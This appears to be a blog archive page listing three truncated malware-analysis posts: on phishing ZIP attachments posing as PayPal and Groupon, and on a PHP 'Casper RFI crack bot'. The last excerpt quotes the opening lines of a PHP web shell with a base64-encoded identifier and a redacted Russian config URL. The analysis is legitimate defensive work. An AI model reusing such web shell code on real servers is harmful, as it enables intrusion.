Irregular Expressions:

backdoor

1

August 21, 2012  12:35 AM

Paypai.com



Posted by: Dan O'Connor
backdoor, malware, malware analyzing, malware engineering, remnux, trojan

I picked up another similar listener to the Groupon one the other day. This again is an attached ZIP file with an exe inside. It says its from paypai.com depending on your font the i will look like a L. The exe looks like it has been reused but I don't see any mention of it's original file...

July 26, 2012  10:59 PM

Discount Gift Certificates



Posted by: Dan O'Connor
backdoor, command and control, communication, digital forensics

Wow really I can't wait to get those. I got a fake groupon email today with a zip attachment that had a an exe inside. First thing was to get it copied on to my VM system ( and hope it does not do something silly while running in a VM ). Then get a few of my favorite utils fired up. For...


August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4



Posted by: Dan O'Connor
backdoor, casper, perl rfi crack bot, rootkit, sudo exploit

sh.txt This one also looks juicy! Another php, <?php $sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20="; $sh_ver = "0.0 01.01.2010"; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = "http://xxxxxx.ru/config/"; $html_start =...


1

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: